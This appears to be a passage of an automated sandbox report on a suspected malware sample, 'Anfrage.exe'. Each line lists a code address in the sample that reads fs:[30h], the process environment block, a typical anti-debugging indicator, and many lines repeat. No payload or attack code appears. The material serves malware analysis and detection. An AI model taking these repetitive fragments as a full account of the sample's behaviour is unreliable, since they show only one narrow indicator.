            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646B450 mov eax, dword ptr fs:[00000030h]7_2_3646B450
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646B450 mov eax, dword ptr fs:[00000030h]7_2_3646B450
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646B450 mov eax, dword ptr fs:[00000030h]7_2_3646B450
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646B450 mov eax, dword ptr fs:[00000030h]7_2_3646B450
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E340D mov eax, dword ptr fs:[00000030h]7_2_363E340D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3649547F mov eax, dword ptr fs:[00000030h]7_2_3649547F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36447410 mov eax, dword ptr fs:[00000030h]7_2_36447410
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1460 mov eax, dword ptr fs:[00000030h]7_2_363C1460
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1460 mov eax, dword ptr fs:[00000030h]7_2_363C1460
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1460 mov eax, dword ptr fs:[00000030h]7_2_363C1460
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1460 mov eax, dword ptr fs:[00000030h]7_2_363C1460
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C1460 mov eax, dword ptr fs:[00000030h]7_2_363C1460
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DF460 mov eax, dword ptr fs:[00000030h]7_2_363DF460
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DF460 mov eax, dword ptr fs:[00000030h]7_2_363DF460
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DF460 mov eax, dword ptr fs:[00000030h]7_2_363DF460
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DF460 mov eax, dword ptr fs:[00000030h]7_2_363DF460
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DF460 mov eax, dword ptr fs:[00000030h]7_2_363DF460
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363DF460 mov eax, dword ptr fs:[00000030h]7_2_363DF460
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB440 mov eax, dword ptr fs:[00000030h]7_2_363CB440
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB440 mov eax, dword ptr fs:[00000030h]7_2_363CB440
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB440 mov eax, dword ptr fs:[00000030h]7_2_363CB440
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB440 mov eax, dword ptr fs:[00000030h]7_2_363CB440
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB440 mov eax, dword ptr fs:[00000030h]7_2_363CB440
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CB440 mov eax, dword ptr fs:[00000030h]7_2_363CB440
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B74B0 mov eax, dword ptr fs:[00000030h]7_2_363B74B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B74B0 mov eax, dword ptr fs:[00000030h]7_2_363B74B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F34B0 mov eax, dword ptr fs:[00000030h]7_2_363F34B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364954DB mov eax, dword ptr fs:[00000030h]7_2_364954DB
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364694E0 mov eax, dword ptr fs:[00000030h]7_2_364694E0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C9486 mov eax, dword ptr fs:[00000030h]7_2_363C9486
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C9486 mov eax, dword ptr fs:[00000030h]7_2_363C9486
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB480 mov eax, dword ptr fs:[00000030h]7_2_363BB480
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364914F6 mov eax, dword ptr fs:[00000030h]7_2_364914F6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364914F6 mov eax, dword ptr fs:[00000030h]7_2_364914F6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364674B0 mov eax, dword ptr fs:[00000030h]7_2_364674B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CD534 mov eax, dword ptr fs:[00000030h]7_2_363CD534
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CD534 mov eax, dword ptr fs:[00000030h]7_2_363CD534
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CD534 mov eax, dword ptr fs:[00000030h]7_2_363CD534
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CD534 mov eax, dword ptr fs:[00000030h]7_2_363CD534
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CD534 mov eax, dword ptr fs:[00000030h]7_2_363CD534
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363CD534 mov eax, dword ptr fs:[00000030h]7_2_363CD534
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FD530 mov eax, dword ptr fs:[00000030h]7_2_363FD530
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FD530 mov eax, dword ptr fs:[00000030h]7_2_363FD530
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646B550 mov eax, dword ptr fs:[00000030h]7_2_3646B550
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646B550 mov eax, dword ptr fs:[00000030h]7_2_3646B550
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646B550 mov eax, dword ptr fs:[00000030h]7_2_3646B550
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F7505 mov eax, dword ptr fs:[00000030h]7_2_363F7505
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F7505 mov ecx, dword ptr fs:[00000030h]7_2_363F7505
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FB570 mov eax, dword ptr fs:[00000030h]7_2_363FB570
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363FB570 mov eax, dword ptr fs:[00000030h]7_2_363FB570
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB562 mov eax, dword ptr fs:[00000030h]7_2_363BB562
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646F525 mov eax, dword ptr fs:[00000030h]7_2_3646F525
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646F525 mov eax, dword ptr fs:[00000030h]7_2_3646F525
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646F525 mov eax, dword ptr fs:[00000030h]7_2_3646F525
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646F525 mov eax, dword ptr fs:[00000030h]7_2_3646F525
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646F525 mov eax, dword ptr fs:[00000030h]7_2_3646F525
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646F525 mov eax, dword ptr fs:[00000030h]7_2_3646F525
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646F525 mov eax, dword ptr fs:[00000030h]7_2_3646F525
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647B52F mov eax, dword ptr fs:[00000030h]7_2_3647B52F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495537 mov eax, dword ptr fs:[00000030h]7_2_36495537
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364955C9 mov eax, dword ptr fs:[00000030h]7_2_364955C9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF5B0 mov eax, dword ptr fs:[00000030h]7_2_363EF5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF5B0 mov eax, dword ptr fs:[00000030h]7_2_363EF5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF5B0 mov eax, dword ptr fs:[00000030h]7_2_363EF5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF5B0 mov eax, dword ptr fs:[00000030h]7_2_363EF5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF5B0 mov eax, dword ptr fs:[00000030h]7_2_363EF5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF5B0 mov eax, dword ptr fs:[00000030h]7_2_363EF5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF5B0 mov eax, dword ptr fs:[00000030h]7_2_363EF5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF5B0 mov eax, dword ptr fs:[00000030h]7_2_363EF5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF5B0 mov eax, dword ptr fs:[00000030h]7_2_363EF5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3643D5D0 mov eax, dword ptr fs:[00000030h]7_2_3643D5D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3643D5D0 mov ecx, dword ptr fs:[00000030h]7_2_3643D5D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E15A9 mov eax, dword ptr fs:[00000030h]7_2_363E15A9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E15A9 mov eax, dword ptr fs:[00000030h]7_2_363E15A9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E15A9 mov eax, dword ptr fs:[00000030h]7_2_363E15A9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E15A9 mov eax, dword ptr fs:[00000030h]7_2_363E15A9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E15A9 mov eax, dword ptr fs:[00000030h]7_2_363E15A9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364935D7 mov eax, dword ptr fs:[00000030h]7_2_364935D7
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364935D7 mov eax, dword ptr fs:[00000030h]7_2_364935D7
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364935D7 mov eax, dword ptr fs:[00000030h]7_2_364935D7
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B758F mov eax, dword ptr fs:[00000030h]7_2_363B758F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B758F mov eax, dword ptr fs:[00000030h]7_2_363B758F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B758F mov eax, dword ptr fs:[00000030h]7_2_363B758F
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E15F4 mov eax, dword ptr fs:[00000030h]7_2_363E15F4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E15F4 mov eax, dword ptr fs:[00000030h]7_2_363E15F4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E15F4 mov eax, dword ptr fs:[00000030h]7_2_363E15F4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E15F4 mov eax, dword ptr fs:[00000030h]7_2_363E15F4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E15F4 mov eax, dword ptr fs:[00000030h]7_2_363E15F4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E15F4 mov eax, dword ptr fs:[00000030h]7_2_363E15F4
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644B594 mov eax, dword ptr fs:[00000030h]7_2_3644B594
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644B594 mov eax, dword ptr fs:[00000030h]7_2_3644B594
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E95DA mov eax, dword ptr fs:[00000030h]7_2_363E95DA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3645D5B0 mov eax, dword ptr fs:[00000030h]7_2_3645D5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3645D5B0 mov eax, dword ptr fs:[00000030h]7_2_3645D5B0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F5BE mov eax, dword ptr fs:[00000030h]7_2_3647F5BE
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364535BA mov eax, dword ptr fs:[00000030h]7_2_364535BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364535BA mov eax, dword ptr fs:[00000030h]7_2_364535BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364535BA mov eax, dword ptr fs:[00000030h]7_2_364535BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364535BA mov eax, dword ptr fs:[00000030h]7_2_364535BA
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F55C0 mov eax, dword ptr fs:[00000030h]7_2_363F55C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364935B6 mov eax, dword ptr fs:[00000030h]7_2_364935B6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647B256 mov eax, dword ptr fs:[00000030h]7_2_3647B256
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647B256 mov eax, dword ptr fs:[00000030h]7_2_3647B256
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644D250 mov ecx, dword ptr fs:[00000030h]7_2_3644D250
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648D26B mov eax, dword ptr fs:[00000030h]7_2_3648D26B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648D26B mov eax, dword ptr fs:[00000030h]7_2_3648D26B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36401270 mov eax, dword ptr fs:[00000030h]7_2_36401270
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36401270 mov eax, dword ptr fs:[00000030h]7_2_36401270
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F7208 mov eax, dword ptr fs:[00000030h]7_2_363F7208
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F7208 mov eax, dword ptr fs:[00000030h]7_2_363F7208
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E9274 mov eax, dword ptr fs:[00000030h]7_2_363E9274
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495227 mov eax, dword ptr fs:[00000030h]7_2_36495227
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F724D mov eax, dword ptr fs:[00000030h]7_2_363F724D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9240 mov eax, dword ptr fs:[00000030h]7_2_363B9240
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9240 mov eax, dword ptr fs:[00000030h]7_2_363B9240
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D52A0 mov eax, dword ptr fs:[00000030h]7_2_363D52A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D52A0 mov eax, dword ptr fs:[00000030h]7_2_363D52A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D52A0 mov eax, dword ptr fs:[00000030h]7_2_363D52A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D52A0 mov eax, dword ptr fs:[00000030h]7_2_363D52A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F329E mov eax, dword ptr fs:[00000030h]7_2_363F329E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F329E mov eax, dword ptr fs:[00000030h]7_2_363F329E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364712ED mov eax, dword ptr fs:[00000030h]7_2_364712ED
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364952E2 mov eax, dword ptr fs:[00000030h]7_2_364952E2
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646B2F0 mov eax, dword ptr fs:[00000030h]7_2_3646B2F0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646B2F0 mov eax, dword ptr fs:[00000030h]7_2_3646B2F0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F2F8 mov eax, dword ptr fs:[00000030h]7_2_3647F2F8
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B92FF mov eax, dword ptr fs:[00000030h]7_2_363B92FF
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495283 mov eax, dword ptr fs:[00000030h]7_2_36495283
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364572A0 mov eax, dword ptr fs:[00000030h]7_2_364572A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364572A0 mov eax, dword ptr fs:[00000030h]7_2_364572A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB2D3 mov eax, dword ptr fs:[00000030h]7_2_363BB2D3
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB2D3 mov eax, dword ptr fs:[00000030h]7_2_363BB2D3
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BB2D3 mov eax, dword ptr fs:[00000030h]7_2_363BB2D3
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF2D0 mov eax, dword ptr fs:[00000030h]7_2_363EF2D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF2D0 mov eax, dword ptr fs:[00000030h]7_2_363EF2D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364892A6 mov eax, dword ptr fs:[00000030h]7_2_364892A6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364892A6 mov eax, dword ptr fs:[00000030h]7_2_364892A6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364892A6 mov eax, dword ptr fs:[00000030h]7_2_364892A6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364892A6 mov eax, dword ptr fs:[00000030h]7_2_364892A6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364492BC mov eax, dword ptr fs:[00000030h]7_2_364492BC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364492BC mov eax, dword ptr fs:[00000030h]7_2_364492BC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364492BC mov ecx, dword ptr fs:[00000030h]7_2_364492BC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364492BC mov ecx, dword ptr fs:[00000030h]7_2_364492BC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C92C5 mov eax, dword ptr fs:[00000030h]7_2_363C92C5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C92C5 mov eax, dword ptr fs:[00000030h]7_2_363C92C5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB2C0 mov eax, dword ptr fs:[00000030h]7_2_363EB2C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495341 mov eax, dword ptr fs:[00000030h]7_2_36495341
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B7330 mov eax, dword ptr fs:[00000030h]7_2_363B7330
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EF32A mov eax, dword ptr fs:[00000030h]7_2_363EF32A
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F367 mov eax, dword ptr fs:[00000030h]7_2_3647F367
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36463370 mov eax, dword ptr fs:[00000030h]7_2_36463370
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C7370 mov eax, dword ptr fs:[00000030h]7_2_363C7370
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C7370 mov eax, dword ptr fs:[00000030h]7_2_363C7370
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363C7370 mov eax, dword ptr fs:[00000030h]7_2_363C7370
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644930B mov eax, dword ptr fs:[00000030h]7_2_3644930B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644930B mov eax, dword ptr fs:[00000030h]7_2_3644930B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644930B mov eax, dword ptr fs:[00000030h]7_2_3644930B
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648132D mov eax, dword ptr fs:[00000030h]7_2_3648132D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648132D mov eax, dword ptr fs:[00000030h]7_2_3648132D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9353 mov eax, dword ptr fs:[00000030h]7_2_363B9353
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363B9353 mov eax, dword ptr fs:[00000030h]7_2_363B9353
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BD34C mov eax, dword ptr fs:[00000030h]7_2_363BD34C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363BD34C mov eax, dword ptr fs:[00000030h]7_2_363BD34C
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647B3D0 mov ecx, dword ptr fs:[00000030h]7_2_3647B3D0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363E33A5 mov eax, dword ptr fs:[00000030h]7_2_363E33A5
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F33A0 mov eax, dword ptr fs:[00000030h]7_2_363F33A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F33A0 mov eax, dword ptr fs:[00000030h]7_2_363F33A0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3647F3E6 mov eax, dword ptr fs:[00000030h]7_2_3647F3E6
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364953FC mov eax, dword ptr fs:[00000030h]7_2_364953FC
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3649539D mov eax, dword ptr fs:[00000030h]7_2_3649539D
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3641739A mov eax, dword ptr fs:[00000030h]7_2_3641739A
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3641739A mov eax, dword ptr fs:[00000030h]7_2_3641739A
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364613B9 mov eax, dword ptr fs:[00000030h]7_2_364613B9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364613B9 mov eax, dword ptr fs:[00000030h]7_2_364613B9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364613B9 mov eax, dword ptr fs:[00000030h]7_2_364613B9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646705E mov ebx, dword ptr fs:[00000030h]7_2_3646705E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3646705E mov eax, dword ptr fs:[00000030h]7_2_3646705E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_36495060 mov eax, dword ptr fs:[00000030h]7_2_36495060
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3644106E mov eax, dword ptr fs:[00000030h]7_2_3644106E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3643D070 mov ecx, dword ptr fs:[00000030h]7_2_3643D070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov ecx, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363D1070 mov eax, dword ptr fs:[00000030h]7_2_363D1070
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363EB052 mov eax, dword ptr fs:[00000030h]7_2_363EB052
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648903E mov eax, dword ptr fs:[00000030h]7_2_3648903E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648903E mov eax, dword ptr fs:[00000030h]7_2_3648903E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648903E mov eax, dword ptr fs:[00000030h]7_2_3648903E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3648903E mov eax, dword ptr fs:[00000030h]7_2_3648903E
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3643D0C0 mov eax, dword ptr fs:[00000030h]7_2_3643D0C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_3643D0C0 mov eax, dword ptr fs:[00000030h]7_2_3643D0C0
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_364950D9 mov eax, dword ptr fs:[00000030h]7_2_364950D9
            Source: C:\Users\user\Desktop\Anfrage.exeCode function: 7_2_363F909C mov eax, dword ptr fs:[00000030h]7_2_363F909C
